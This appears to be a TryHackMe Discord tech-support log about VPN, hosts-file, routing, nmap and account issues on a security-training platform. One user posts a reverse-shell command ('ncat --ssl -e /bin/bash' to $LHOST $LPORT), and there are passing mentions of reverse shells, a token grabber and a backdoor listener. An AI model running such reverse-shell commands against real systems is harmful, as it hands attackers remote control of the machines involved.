Not all rooms run webservers on port 80 so you should not use that as your check

Yeah it works

Ignore /access

I also cannot ping or nmap the IP.

10.10.10.10 works alright

Not all machines respond to pings. Please tell us what the machine is

And I have tried many different rooms, including many that I already completed and that I know have webservers.

I am using this Machine in my case: https://tryhackme.com/room/uploadvulns

I'll try using the kali attack box to make sure that the errors is from my workstation

but as you can see those are links accessed yesterday from the same Machine:

@steel thorn that is not a public DNS name, and you say yesterday... Is the IP different from yesterday?

Check your hosts file

Make sure there are not duplicate entries and make sure the IP is correct

It's very possible, didn't think about it

how do I check that?

open a bash do a ping command to the shell.uploadvuluns.thm something

The IP will be different each time you deploy it

It will give you an IP address.

No no no

More simple

Compare it to the IP address that's listed in the task section.

Fix it in your hosts file.

Attack box same

Just replace the old IP with the new one

Yeah it's def. your hosts file...

Needs to be in your hosts file on the attackbox too.

Please follow the steps that I asked you to.

Alright

Hosts file

/etc/hosts ?

@zinc nexus you wanted to type something about having issues with the openvpn, you regenerated the openvpn file, and you've opened it I assume and went to test it, did it work/what did you do/what did you get?

Yes.

I guess the Machine_IP is causing the problem?

Yes

even the 2nd one is not the same

as the new one

so delete both

Here are a couple I tried in the last 5min:

• https://tryhackme.com/room/owasptop10
• https://tryhackme.com/room/authenticate
• https://tryhackme.com/room/webfundamentals
• https://tryhackme.com/room/owaspjuiceshop

replace the 2nd one with the new one?

I would leave one there and just change the IP address @steel thorn

I don't understand what you're saying but yes.
You should not have duplicate entries

Alright, thanks guys

Ok, many of those rooms have machines where the webservers are on other ports

authenticate is on a bunch of ports like 7777 and 8888

webfundamentals is 8081

For authenticate, I used IP:8888

Are there any rooms you know off hand that I can use to test?

Did you test the 10.10.10.10 in your browser with the VPN active?

James requested that before also. It should give you a flag

(Yes, they did)

yes, it tells me I am connected and gives me the flag and my TryHackME VPN

Worked like a charm, thanks guys

OH sorry Didn't see that you also had the VPN working correctly between all the messages 😦

Too many people with the same colors XD

Since it would've taken me forever by myself, the hosts file basically keep the IP address of all those links and cache it ?

If anyone is free, I can jump in a voice chat and share my screen? Maybe it will be obvious to someone with more experience? (Is my TryHackMe VPN something I should keep private or does it matter if I share it with others?)

The IP isn't too sensitive

No idea if it hurts if you give it away. As things change every time you connect except for the credentials so don't give the ovpn file away I guess XD

I can offer to take a look together in like 6 minutes, if james is too busy with stuff. But I can't guarantee I can help you fully as I am way less experienced than James is with all the rooms and stuff.

No worries if you can't help! Another look is always appreciated. I'm pretty new to all this. I am free in 6min 🙂

I just tried the OWASP Juice Shop room again and it worked.... let me try the other rooms again...

Your hosts file isn't so much a cache file, as it isn't updated dynamically. The hosts file is something you can compare to your local DNS server on the machine itself. It will first look in the hosts file for an entry when you type in a DNS name, if it can't find it there, it will go to your DNS server IP that is configured in your networking adapter (which is most likely your ISP DNS server).

Some malware like to change the hosts file also to redirect traffic to malicious servers. In Windows the hosts file is in C:\windows\system32\drivers\etc, in Linux it's just in the /etc folder.

I still cannot get into Authenticate room. It says "Error code: SSL_ERROR_RX_RECORD_TOO_LONG". So I am googling about certifications now.

Change the https:// to http://

Interesting, thanks for the explanation, I am glad I had this problem

Gave +1 Rep to @true needle

If you wanna know more about DNS: https://tryhackme.com/room/dnsindetail

Thank you! It works. I was just typing in the IP and pressing enter. I guess Ubuntu does that differently than Windows.

Gave +1 Rep to @eager fulcrum

https by default is becoming more common, I think it's a firefox thing

Sorry for the headaches all 😅

That is the piece of understanding I was missing.

Can I ask if it was the same error all along?

The most valuable lesson here would be providing screenshots of errors or error messages alongside the context, IMO

No it wasn't. It usually just said the page was unable to load. I think that may have come up once this morning, but not any of the other 25+ times I tried!

I sent this screenshot this morning

Is there a way to share badges to socials after the prompt goes away? I haven't figured it out if there is.

on your profile page there should be a button near the top, under your name to "share room badges"

I launched openvpn, and I can't ping the started machine

ah my baddd, There should be routers --'

are you able to access 10.10.10.10?

my badd, all good

ICMP blocked

thanks!

Gave +1 Rep to @livid vapor

Just a heads up.

When I try to generate on ovpn config for AU-Regular-1 and the download it, I get redirected to a 404 page.

Works fine if I switch to EU-Regular-1 though.

Anybody know why my Kali Linux VM wont connect to internet anymore?

@paper prawn this channel is for directly tryhackme related support like site or vpn issues.

I am having issue the input of admin's ntlm hash on the site it wont correct. not sure why -

Is there a known issue with REDSTONE? I have solved the box before but now it will not work again with the ||ruby|| file on the machine.

The target machine was updated and hardened against some common tactics. Can you post your issue in the #842144147660996659 channel please?

guys i have a basic question

The date I see on the virtual machine and the date I see on my host computer do not match. today's recording does not appear when I log in to my virtual machine

why?

this is from my host machine

Did you try to clear the browser cache in the virtual machine?

yes i also tried to check on another web browser

so weird

is your time zone / country correct on the website?

how can i check timezone on tryhackme?

it would be set by what country you have showing I think

oh yes it's correct

also my virtual machine date time zone is same with my own pc

hmm not sure then sorry 😭

i can't understand

that would not be the problem, the problem is that the information displayed on your computer and the virtual machine differs

yes

which one should I base on?

oh I see

it sounds like your vm might have a cache issue like suggested

i'm trying to get 90 day badge (challange with myself) and i don't want to loose my points

hmm

just keep the screenshots and if you are worried about your streak you can emial support but I don't think it's a big issue

it has already been said that this chart is sometimes not reliable, if on your computer the browser shows the updated information then don't worry.

oh okay

understood

thanks a lot!

I have just visited your profile, the activity is up to date, don't worry 👍

oh great, so it looks like the problem related with my vm machine

i’ll going to clean entire cache

thanks @patent lark !

Gave +1 Rep to @patent lark

Hey, something weird is going on. Somehow THM says i'm still connected with their openvpn, but I shut down the connection & vm 10 minutes ago. Any idea?

Ignore the access page

Okay 🙂

BufferOverFlowPrep: I have an issue with the rev shell only half connecting when using my own kali machine. I can use THM's Attack Box just fine (complete the exercise and get the rev shell). I can even netcat files back n forth from my machine to the Attack box. I just can't complete the final step (reverse shell connection) to my own machine. Is this a Python 2 vs Python 3 syntax issue in the exploit script? I notice the Attack Box only has Python 2.7 installed. My kali 2021.1 has Python 1,2&3. 10.10.10.10 verifies I'm connected and shows my vpn ip. The exploit code does not work with python3 - syntax errors galore. But python2 worked fine on THM's box, and ran the code on my machine- just couldn't get the connection back. https://tryhackme.com/room/bufferoverflowprep

I'm not getting the student discont option when trying to subscribe your service, even though i use the .edu email of my university in my account. What can i do?

Email support

does THM still have the discount for students?

like if you are in college for example

Yes

I'm guessing though you have to have the school email address as your account email login?

I'm asking for a friend, not me

For it to be automatic, yes

OK, thanks!

Gave +1 Rep to @eager fulcrum

hey, I have a problem. whenever I want to open the vulnveristy room, it just keeps showing the loading spinny thing, but doesn't actually load. can you help me?

Try a hard refresh

it's still loading

Replace /room/ with /jr/

it just redirects to /room/

Yea, but it normally lets it load properly

@zealous yoke more issues loading rooms, this seems to be becoming a lot more common lately

ok, i tried it in chromium now and it works

and now it also works in firefo

x

#infosec-general please, this channel is for directly THM related support

oh my bad

is there a site admin available to chat to please? Im running an encrypted shell (ncat --ssl) but the shell just keeps dying. ive tired across a few machines. is there something THM do to prevent encrypted shells or something?

No

why would my shell keep dying - have you any idea?

/tmp/ncat $LHOST $LPORT --ssl -e /bin/bash & thats my shell line

No idea

I know Muir uses encrypted shells all the time though

ok thanks - perhaps i need a chat with him

I can't download my VPN configuration file

I get this error

NVM I changed my VPN servers

Hi! For the past half our my VPN keeps crashing every two minutes, saying "disconnected" - the THM Browser-Based one. I have to close the page, show split view and everything will be in place, but as soon as I have it in full screen, it crashes every two minutes

This channel is for directly tryhackme related tech support like site or VPN issues

ah sry

Hi, I've just finished the complete beginner path.
When i want to generate my certificate, it use my username.
It is possible to generate the certificate with my full name ?

Not now that the certificate has been generated

I'll pass this along -- thanks!

Gave +1 Rep to @eager fulcrum

I hazardly assume it the infamous spinning circle?

@eager fulcrum this is danny reporting

!tokenremove 803564182934650880

Done, no more entry with UID "803564182934650880".

Should be sorted now

ok let me see

Last year I tried to create a room which I never ended up doing because I ran into problems creating the machine.
I am working on one now and just saw that there are 3 uploads that I can not remove. Who should I reach out to so they can delete these?

Hello!
I just have a problem with my connection.
Let me explain this:

• In AttackBox machine, I can access the machines and also use other websites like google, github, etc.
• In my Kali with VPN active I can access only the machines.

It is a setting that I'm missing or something else?
P.s: I just checked the routes and they are exactly the same in my vm like in AttackBox

Thank you for your time!

Can you show us your routing table please?

So I think the issue is that it's trying to route default over the VPN first?

The THM VPN configs shouldn't add that route

Yeah, exactly

So I should move default to be the last one?

Hey I cant upload a file nowhere, even in a #room-help whereby I need a helping hand on an issue in one of the public room I ve been working on.. Could anyone help in here?

!docs verify

Follow these steps please

Then you can send images

thanks

What do you recommend me to do?

IDK, I try not to mess with routing where I can avoid it

Yeah, you're right ... I will just google more about this problem

this is the first ever message in this channel

Hey @naive dust I hope you didn't ping Skidy :c

I wonder how you even got it like that. I will admit that I always go into the openvpn profile and check the routing in there and uncheck one checkbox on parrot os. But that is more of an automatic thing from personal experience.

Might be that I have to do that because I've imported the openvpn profile into the network manager.

That. I got the same issue and have to "tick" an option in the route config of Network Manager (using Kali Linux)

Something like "use this connection only for resources of this network". Defeats the new default route

Yep that option... 😋

I always click that by default when importing a vpn config.

Nevermind, I found that I have to email support because I signed up with my school email, but it's not verifying and still showing me $10.

A related question, am I fine to start without having Premium, or should I wait to start with?

You can start without

Sounds good, thanks

I will look tomorrow. Thank you so much @true needle @livid mauve 🤗

Gave +1 Rep to @true needle

Is there anyway to change your Flag anymore?

Yes, but you don't get to pick

https://tryhackme.com/update-timezone
Click this, without a VPN, and it should set your flag

@eager fulcrum thanks

Gave +1 Rep to @eager fulcrum

why my linux is like pixel art

This channel is for directly tryhackme related tech support lite site or VPN issues

ok sorry, where can i ask fotr my kali linux?

#infosec-general please

ok

@true needle I just checked your idea and that option is unchecked by default.
I also tried to check it, but the problem is the same. Not working with both

Yeah I check that option always to force the connection to only use it when needed...

That must have been what was on my mind. Let me connect to the VPN and see my routing table.

default via 192.168.178.1 dev wlan0 proto dhcp metric 600
10.10.0.0/16 via 10.14.0.1 dev tun0 proto static metric 50
10.14.0.0/17 dev tun0 proto kernel scope link src 10.14.11.68 metric 50
192.168.178.0/24 dev wlan0 proto kernel scope link src 192.168.178.52 metric 600
192.168.178.1 dev wlan0 proto static scope link metric 600

So are you using Linux or Windows for the routing? Else you can easily fix it by adding a route to the table to make it so that only 10.10.0.0/16 go via the tunnel same with 10.14.0.0/17

I rechecked everything and seems to work with the option ticked

Can you verify it with a route print? Just to make sure 😉

At least it isn't fubarring the default route it seems. So why not try to connect to 10.10.10.10 via your browser on http

It is not connecting to http://10.10.10.10

But google, youtube, git, everything works including the ping to THM machine

If you've got a VPN you should be able to open that site though XD

Networks uses a different configuration file than the THM VPN, you can see it in the Access section

I don't have anything on 10.10.10.10, or I'm missing something?

Try it again, but this time with the checkbox off so as to use it for all resources.

You will lose internet I presume as in normal browsing capabilities.

Hmm, neah, not working, it keeps loading to 10.10.10.10

But it's not working also without VPN active

I don't catch the point with the 10.10.10.10 :))

Might wanna redownload the VPN profile just to make sure. As I would expect that the site will work when you've got the VPN active.

if you've got vpn and you go to http://10.10.10.10 you'll get a site that verifies that your VPN is working correctly and you can access THM boxes.

Let me redownload everything

Yeah, you're right.

connection_verified

Now everything seems to work without box checked... THM boxes, google, git

Ok, well that's the important thing (that it works). 🙂

I really don't get it :))
I have access to HTB with checked and unchecked box.
But I have access to others only when it wants =))
I will test in depth this situation.
It worked, but after that it stopped working with other sites.

Also check if you're using the latest openvpn software just to make sure.

I just updated to the latest version.
It seems that with your option checked it's working as I want (access google+HTB).
I will let it like that...

Thank you so much for your time!

No problem. As I thought that was the issue the first time. But didn't expect there to be some other wonky stuff that made it so that you had to redownload the vpn file.

It seems to work also with the old vpn file, but that checkbox made it harder to get

I really don't know
I have this problem from the beginning but yesterday it drives me crazy so I asked here the question :))
So initial the box was unchecked, but didn't work on google(only on THM), after that I checked the box, the same, but after unchecking it's working.
Maybe a bug or something?

That or it might have not fully activated. It would only honor that box when connecting, so if your VPN was active at that time, it would already explain why it didn't work.

Probably.
But it was active by default with the box unchecked, this is strange

Nevermind :)) Glad that it worked.
Thank you, again!

How long should a nmap -p- scan take inside a debian 10 VM?

Mine takes 15 minutes now...

-p- takes a lot... Because it scan every port from 0-65535 ...

can take quite a while

Press space or enter and see the progress

if you add -v (vv or vvv) to your command you can see the progress as it goes

Thanks! 🙂

it takes even longer if you add other switches like -sV and -sC

though, only the normal amount longer those switches add because it only runs them on open ports

But I still think that 15 minutes is a lot... But this depends on the network connection also

I got nmap -T4 -A -p- -v {target} now.

The progress is increasing when you press space?

My upload speed is 2mb/s and download around 8mb/s lmoa

Let it run a little bit, and if the progress is not increasing in few minutes, restart it. But first, let it run more. Maybe takes some time because of the internet

"Giving up on port because retransmission cap hit (6)"

SYN Stealth Scan Timing:

Also to speed up things, they advice to use the attackbox for nmap scans. As it's on the same network so it won't be depending on your own internet speed.

Ah, thats a good one. didn't think about that 🙂

Everyday I get 1 hour attackbox correct?

Free members indeed. But if you have a subscription it's longer to unlimited I think even.

Havent tested it past the 3 hours XD

Okay haha thank you.

you could also do nmap scans and save the output when you are about to go do something else, and then work on the box another time or when you get back, maybe scan a few boxes in advance, if the time it takes is costing you productivity

or something like rustscan (there is a THM room for this) is very fast

How to attach files?

You need to verify

!docs verify

read the document!

I have done that already

You haven't

Where do I need to do that?

https://help.tryhackme.com/community/discord

Thanks 😊

Any help with Openvpn?

Regenerate, wait 2 minutes, download

Thank you

hey THM, I need help..... I just joined this room a few hours earlier

https://tryhackme.com/room/anthem

everything went well when I did that, after some time, I took a break and came back and restarted the machine,

but I just cant access it, I cant ping it nor I can do any nmap scans.... it shows the host is down

Heres what I tried:

Terminate the machine and started it again

waited for 10 minutes for it to config

regenerated access token

are you connected to vpn?

yaaa of course, lol

i also tried to connnect other machines..... It worked

I played two other boxes and again came back to this..... but its still not working

ohh ohk

um? d' u know wts with it?

tbh it did happened with me once

but i am not aware of trouble shooting steps

you need to wait for sometime

I did, I terminated it, played two other ones, came back after 3 hours but it is still not working.

Is it only me?

just try logout and login

then

did that toooo

😆

Also changed VPN servers

but nothing seems to work....

is it possible that I broke the box? 😅

lol

I mean.... it should have restored while I terminated right? but it didnt....

does anyone else knows wt going on?????

It is a windows machine

Windows machines, by default, do not respond to pings on TryHackMe due to the firewall

Hi, may I ask if the subscription is charged in USD or in pounds?

If your country is GB, it will be pounds

Otherwise, USD

┌──(rootkali)-[/home/l1gh7]
└─# touch wow
touch: cannot touch 'wow': Read-only file system

anyone know how to resolve this?

but I did enumerated it before the problem..... found pretty much all flags except the last two ones

This channel is for directly tryhackme related tech support like site or VPN issues. Try #infosec-general

also....... before the problem, nmap and enum4linux worked well

👍

did now

Hello everybody.
I have problem with this room https://tryhackme.com/room/attacktivedirectory. Task 4
There not installed kerbrute at attacking machine, or I can't find it.

Hi! I have finished a learning path and I want to download the certificate, but with my real name on it. In the past, I had filled in Profile -> General -> Full name another name than the real one, and it appears on the certificate. I changed the name to the real one, but the old value (name) still appears on the certificate when I try to download again. Can anyone help / guide me? Thanks in advance!

You can't change the name on the certificate once it's generated

😣 I understand... thank you!

hello guys, I connected with VPN and get a successful message but still, the IP address doesn't work. So what should be doing?

Can you go to http://10.10.10.10/ ?

be more specific. "the ip address"- what do you mean? Which?

exactly

Does that work?

no

then you are not connected to the vpn

Can you verify and share a screen shot please?

!docs verify

@cunning current you'll need to verify first to be able to send a screenshot

yo

@late widget

ESC

did

:wq!

to save and exit

i did

beautiful

so have you deleted the line?

what line

paste in again

wait

so

you have a history entry

you want to delete, no?

yes

I do

/home/kenshiro/.zsh_history

this?

Just a reminder that this channel is for VPN and other technical questions related to TryHackMe

oh

where would you like us to go James

yes

Fawaz told us to go here

we're just pawns

in the game of moderators

lmao

@gaunt thorn

chin him

I was just trying to take off general

general chat dead now

if general is dead that means I did a good job

people not speaking = people not doing anything wrong, right?

you're totally killin' it 😉

Mwahaha

Need help with VPN, have been working before. But now I can get connected, I have tried to download a new file and change server.

what error are you getting?

when was it last working?

Yesterday

Sat May 22 00:04:20 2021 ERROR: Linux route add command failed: external program exited with error status: 2
Sat May 22 00:04:20 2021 WARNING: this configuration may cache passwords in memory -- use the auth-nocache option to prevent this
Sat May 22 00:04:20 2021 Initialization Sequence Completed

just for a sanity check, do a ps aux | grep openvpn and see if anything is running

Fwiw, Linux route add command failed: external program exited with error status: 2 is usually a symptom of multivpn

RNETLINK: File exists is also something that shows up

THought so, but wasn't certain. Figured it couldn't hurt to verify active processes

When you've seen it a hundred or more times, it gets easy to identify 😉

ok, seems like I have multiple vpn running

kill em all and restart one

bot plz

!multivpn

Thanks

Im having issues with the Brainstorm room. The chatserver executable crashes instantly when ran. I've tried win 7,8, and 10 vms both 32 and 64bit. When opened with Immunity Debugger, the executable just hangs. Any help?

This sounds more like a room-help issue.
Make sure you download everything from the FTP server in binary mode otherwise you'll get a corrupt executable

ok, ill give that a shot, thanks

like that

tun11 That's uh. That's bad

It should be tun0

!vpnscript

ok, ive been away awhile but when i left i got this error: tls handshake failed to occur within 60 seconds

i fully reinstalled kali

so could be to do with the settings of my openvpn?

Try a different VPN server

ill try that but i tried all this before and we couldnt find an answer

i worked through the whole shimmy mcjag with hydragyrum

Then your network is probably blocking it

i have seperated parents and its highly unlikely that its blocked at my moms, they arent tech savy at all

will try the other script 1 sex

sec*

It could be blocked at a bunch of different points

Countries like Egypt or China block it at a national level

im in the netherlands so country wide shouldnt be an issue

lol nvm the second script worked

thank god

saved me 3 days compared to the previous hassle

thx 🙂

THM Tech Support or developers guys, did you do a rollback in the user interface?

most people in here are just volunteers. I don't think any stuff are active/awake right now

what's the issue?

I try to hide completed rooms but something weird happens, some of the rooms already done still appear and even, BurpSuite room I have left but still appears

any support is really appreciated, thank you in advance @livid vapor _/_

Gave +1 Rep to @livid vapor

is this in your profile page? Or the search area?

I'm logged in and it is in this url: https://tryhackme.com/rooms

I think this might be an already -known bug, I've seen someone else mention it recently. But you might want to describe it in #site-bugs as well

I joined Learn Burp Suite room when it was free (+2 years ago) then I left, and all was Ok, but since yesterday it appeared again and some of my completed rooms still appear when I click on the checkbox "Hide Completed"

Oh, I see... Well, I will try there, but as I commented, everything was fine but since yesterday it shows weird behavior.
Thank you so much @livid vapor

You're welcome

I think they know about it and are working on it, but I can't say for sure

Please don't just ping me when you want help

Everyone here is a volunteer

sorry

Good morning, I'm sorry to bother. I'm having problems connecting to one of the boxes in the linux fundamentals, I'm sure I'm doing something wrong however I'm unable to connect or ping the box without timeouts. I've tried multiple sessions, same issues. Current IP is 10.10.234.182

Are you connected to the THM VPN?

I am not connected to any VPN via my web browser no. Simply initiated the box via Start Machine

let me try that.

No, not a VPN provider.

The TryHackMe OpenVPN

!vpn

Resolved, thx.

Hey everyone

Can somebody tell me what languages do they use to make tools

like i know some what of scapy and python

but i really dont know what language or framework should i use for creating tools

@flint summit This channel is for VPN and other technical questions related to TryHackMe
I recommend asking in #infosec-general

Hey i have a lag on my KALI LINUX VM

its normal ?

This channel is for VPN and other technical questions related to TryHackMe

this is a technical question related to the VM Try Hack me

my VM Kali Linux TryHackme lag a lot

@eager fulcrum can you help me ?

Is it Kali deployed on tryhackme?

yes

Try the attackbox.

i am on the room burp

Ok.

i need kali linux

Try the attackbox.

You do not.

The attackbox has all of the same tools installed.

ok i try

but why is it lagging when I pay and I have the vip

The attackbox is more optimised.

If you are physically a long distance from Ireland, it will take longer for the packets to travel between you and the machine. It's physics.

oh yes

i am in france

Again. Attackbox.

ok

thanks

The Kali is not maintained as much, and the attackbox is literally designed around the TryHackMe remote access solution

ok

HELP unbale to ping the machine .. but able to ping 10.10.10.10

Anyone!!!???

facing this issue since last few days

25 Days of Cyber Security

Not all machines respond to pings

its 25 Days of Cyber Security

There are like 24 machines in that room

the first one

day1

If it's a windows machine, it's especially unlikely.

Hey everyone! I'm having a bit of trouble when running my OpenVPN configuration file on a kali linux virtual box. Additionally, I get a 404 error when I try to download a new one from the tryhackme site. Can anyone offer assistance?

wait... I think I figured it out, however I still can't get a new configuration file. I'd like to use the US-West VPN servers and only have a configuration file for the EU-1 servers

Hi I would suggest to try download a new from:
https://tryhackme.com/access

or test another EU server

Hi THM, observed an issue. I was accessing the https://tryhackme.com/room/introtoshells room and my antivirus Kaspersky blocking some element, marking as Trojan and that prevents the room from loading. I am putting the information below.

Event: Download denied
User: [Removed]
User type: Active user
Application name: firefox.exe
Application path: C:\Program Files\Mozilla Firefox
Component: Web Anti-Virus
Result description: Blocked
Type: Trojan
Name: HEUR:Trojan.PowerShell.Generic
Precision: Partially
Threat level: High
Object type: File
Object name: introtoshells
Object path: https://tryhackme.com/api/tasks
MD5: 4CF20A2E70662EDCCBF3FAA9DAD9C2A9
Reason: Expert analysis
Databases release date: Yesterday, 21/05/2021 10:56:00

https://opentip.kaspersky.com/4CF20A2E70662EDCCBF3FAA9DAD9C2A9/

No issues with other rooms

So, the room contains reverse shells

So... kinda makes sense that those would be picked up

I get a 404 error when trying to download a new configuration file from that URL - pops up saying the page was lost in the matrix with a darth vader image

Try selecting a different server, perhaps that'll help

Thanks for the suggestion! I did try that with the same result 😑 - I can use an attackbox it's just a lot to follow the video, work the tasks, and work out of the attack box in the same browser window.

Gave +1 Rep to @true needle

how to get cert role?

Some people reported that after changing it, they clicked regenerate and then waited 2 min before trying to download. And that seemed to work.

Cool cool, I'll regenerate it and use the attack box for now, give it a little break lol

Make sure you've got certs and then ask a mod to give you the associated role.

That's at least what I saw happen in General chat most of the times XD

I forgot to do a challenge yesterday and lost my like 20 day streak :'| was wondering if i could get a forgiveness pass :'| if not its ok, i understand :'|

Email support@tryhackme.com

will do, thank you

past policy was pretty forgiving afair

@ashen canopy what do you mean with 'token logged' / how did their tokens get exposed?

¯_(ツ)_/¯

Idk mate this happens all the time

100 ping

wtf

I ain't no raiding expert lmao

where is the chat!!!)??

but how does one get their discord token exposed? Is there a Discord CSRF I don't know about or how does it work? xd

they seem to be hijacked accounts and not bot-generated accs

neither do i

it isnt that hard to come across

@fair edge Btw, not cool that you posted that here.

@latent iron Rule 9 bans the discussion of unethical or illegal actions

oh sorry, but I mean the unethical action was happening right on this server, so ¯_(ツ)_/¯

No reason for you to post a token grabber here though.

I felt it was reasonable to investigate how this works and whether it's a threat that we'd need to be concerned about (like a csrf)
but fair enough, I'll remember for next time

i went to reverify my token

and now its not showing my level

I'm having an issue with my smbclient.

This is what I get.

$ smbclient
CANNOT LINK EXECUTABLE "smbclient": library "libndr-standard.so.0" not found: needed by main executable

I'm using termux for my android.

This channel is for VPN and other technical questions related to TryHackMe

Ight, thanks anyways.

Gave +1 Rep to @gaunt thorn

Hay guys just a question is there anyway to change my username

email support, they can do that

!email

has the THM vpn gotten significantly worse recently. It's really slow and drops out alot. didn't used to be this bad

I keep having to switch to the THM attacking machine instead of my own instance on VPN

Not noticing any issue. But I do use the premium vpn.

Which area's vpn server do you use?

australia

AU-Regular-1

i'm trying to rdp and it's just hopeless

i have one flag left on the offensive path. all i need to do is log in and the flag is on the desktop

Screenshot your OpenVPN output log and send it @worn wraith

i don't seem to be able to upload a file or paste a picture

I managed to get in by trying over and over, got in a couple of times and it kept disconnecting me. eventually got to the desktop in time before it disconnected me

@worn wraith seems like the normal vpn servers are having problems since yesterday.....i am finally able to access machines after using the Vip Server

https://help.tryhackme.com/community/discord

^ to get send image permissions

Hey'o folks!

I have been struggeling getting into the "vulnversity" the last couple of weeks. I have finished half the room, but now it is stuck in a loading loop. Tried switching browser, and my wife can't load the page on her profile either. Other rooms works as normal. Any ideas?

Had the same problem with "Blue", but figured out a solution where I loaded the page from a "given" link. Not sure why it worked, but yeah

try replacing /room/ with /jr/

It's a platform bug ATM and I believe the staff are looking into it. There's a few workarounds.

It switches back to /room/ and the same loop.
But if I saved the whole link with /jr/ and pressed, then it worked!

Thanks a bunch Ninja, you saved my day ❤️

Good to know that worked, happy hacking!

I'm trying to sign up for both a domain name and hosting and I'm planning to use XMR. However, both cases I'm required to provide an address. What does everyone else do in this case. I do not want to put in my actual address on either item

@raven granite This channel is for directly THM related tech support.
They're required to collect that information. Why don't you want that information associated?

I just don't feel comfortable having my identity tied to any hosting services seems like left and right they get hacked

Well it's a requirement but pick a good hosting provider and you won't have that problem.
#infosec-general for anything further please as it's not THM related

thanks!

Gave +1 Rep to @eager fulcrum

This channel is for tech support with tryhackme, like the site and VPN

I recommend asking in #infosec-general

kk

Oh hey, ummm i got marked as a bot here, just wanted to make sure im not, any mods here?

You had your token stolen

Oh god

Change your password, don't use third party clients.

For discord right?

Yes

Alright

Okay done, and turned on 2fa, am i safe now?

Change your password

Should be. Don't use third party clients.

Make sure your password is changed, or else your token won't reset.

For some reason 2FA is useless when your token has been stolen.

Changed the password, thanks, you guys are awesome

where would i ask how to permanently set keyboard layout on kali

#infosec-general please

Hii everyone,
My location on public profile shows very different than my actual country. Can someone please help me correct it?

Is there an option to turn off tags on rooms in the search results from the Search page?

No

hi I need rool tnx man ...

?

to be able to enter the general channel ...

!docs verify

Follow those steps

the website of the machine I deployed isn't loading. I deployed it an hr ago and it still hasn't loaded. I restarted the machine, the vpn, firefox, etc

https://tryhackme.com/room/zthobscurewebvulns task 18

what causes it?

i have connected to the vpn and completed the vpn room with no problem connecting to the machine, but when i tried deploying the machines from voulniversity and blue firefox says: Firefox can’t establish a connection to the server at 10.10.196.237. what should i do ?

The machine is not running a webserver on port 80

Follow the steps in the room, especially the portscan

sry for bothering you, i thought the webpage had to load every time, my bad.

Some machines will, some won't

I work on the nmap-room from my local computer over VPN, but nmap doesn't find the host. Same namp-command in AttackBox works as suspected. I can ping 10.10.10.10 and I haven't noticed any issues with nmap before, it works with hosts on my local network. Can this be a VPN issue?

You cannot ping that machine if you're using the VPN

It's a windows machine, by default it blocks pings from public networks.
The VPN is treated as a public network, while the attackbox is treated a lil differently

Yes, I know. I just tied to ping 10.10.10.10 to verify VPN-connection

Yes, but you can't ping the target machine.

Nmap tells you what to do if the machine is actually up.

Nmap on local machine suggest me to try -Pn

Yes.

So try that.

Ok

https://tryhackme.com/update-timezone Click this, without a VPN, and it should set your flag and timzone

um i can't verify my token with the bot

I am using openvpn through my virtual machine when using TryHackMe. Is there any way to keep using the same terminal without canceling openvpn? What I do now is to minimize that terminal and open a new one to work in.

Check out tmux. It's a terminal multiplexer and lets you run multiple terminals in 1

Alright will look it up

Thanks

There's also a room for it:
https://tryhackme.com/room/rptmux

That is awesome! Will bookmark it.

what is the best way to listen to a backdoor without port forwarding

anyone?

Hi guys. Room Buffer Overflow. Issue:

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.221.2 /workarea

Few seconds after:

[10:02:57:295] [2848:2849] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[10:02:57:295] [2848:2849] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[10:02:57:295] [2848:2849] [INFO][com.freerdp.client.common] - Network disconnect!

After trying reconnect:

─$ xfreerdp /u:admin /p:password /cert:ignore /v:10.10.221.2 /workarea           131 ⨯
[10:04:56:144] [2876:2877] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state
[10:04:56:144] [2876:2877] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr
[10:04:56:144] [2876:2877] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd
[10:04:56:144] [2876:2877] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
[10:04:56:451] [2876:2877] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized
[10:04:56:455] [2876:2877] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state
[10:04:56:455] [2876:2877] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state

actually my wifi router does not suppor port forwarding

Seems it was something with my VMWare Workstation

Now it's all good.

Hey all! I have previously created a team in try hack me with my ctftime team name. But once I have left that team for some reason. Today I tried to create a team with that exact name and it shows that the team name is already exist. And I forgot its password. Is there any way that I can get back that name?

plz DM or ping me

My ovpn isn't working for like the 3rd time
can someone help

Guys, How can I change my card in the portal, to re-subscribe to Premium?

You'll have to cancel your current subscription and re-subscribe using the new card that you wish to use

Could you share a screenshot please?

I fixed it

but thanks for wanting to help 😄

Anyone

Thank You

Gave +1 Rep to @zealous yoke

It keeps showing this. What do I do now?

you have to wait till the sub runs out to re-sub I believe

or click the green text?

@naive dust This channel is for directly tryhackme related support like site or VPN issues

Sorry

@eager fulcrum do you know any server that might be able to help me?

I think it should have already been run out. Today is 24th.

It'll be until midnight / 00:00 GMT iirc

Which isn't for another 10/11 hours

gobuster dir -u http://10.10.39.0:3333 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

[+] Url: http://10.10.39.0:3333
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s

2021/05/24 15:10:11 Starting gobuster in directory enumeration mode

Error: error on running gobuster: unable to connect to http://10.10.39.0:3333/: Get "http://10.10.39.0:3333/": context deadline exceeded (Client.Timeout exceeded while awaiting headers)
what should i do ?

I see, Thank You!!

Gave +1 Rep to @zealous yoke

Is there a way I can see exactly when my streak will run out / when I last answered a question?

i cant seem to get openvpn to work on anything except the first room

the tutorial room

How are you checking it?

Because it's the same VPN for all rooms (except networks). If it's working for one then it's working for all of them.

when i past the ip it gives all i get is this site cant be reached

Not all machines run a webserver like that

If you can access http://10.10.10.10 in your browser, then you're connected

oh ok i was trying to use the Linux Fundamentals Part 2 but i would not let me use attack box so i tried open vpn and could not get it to work

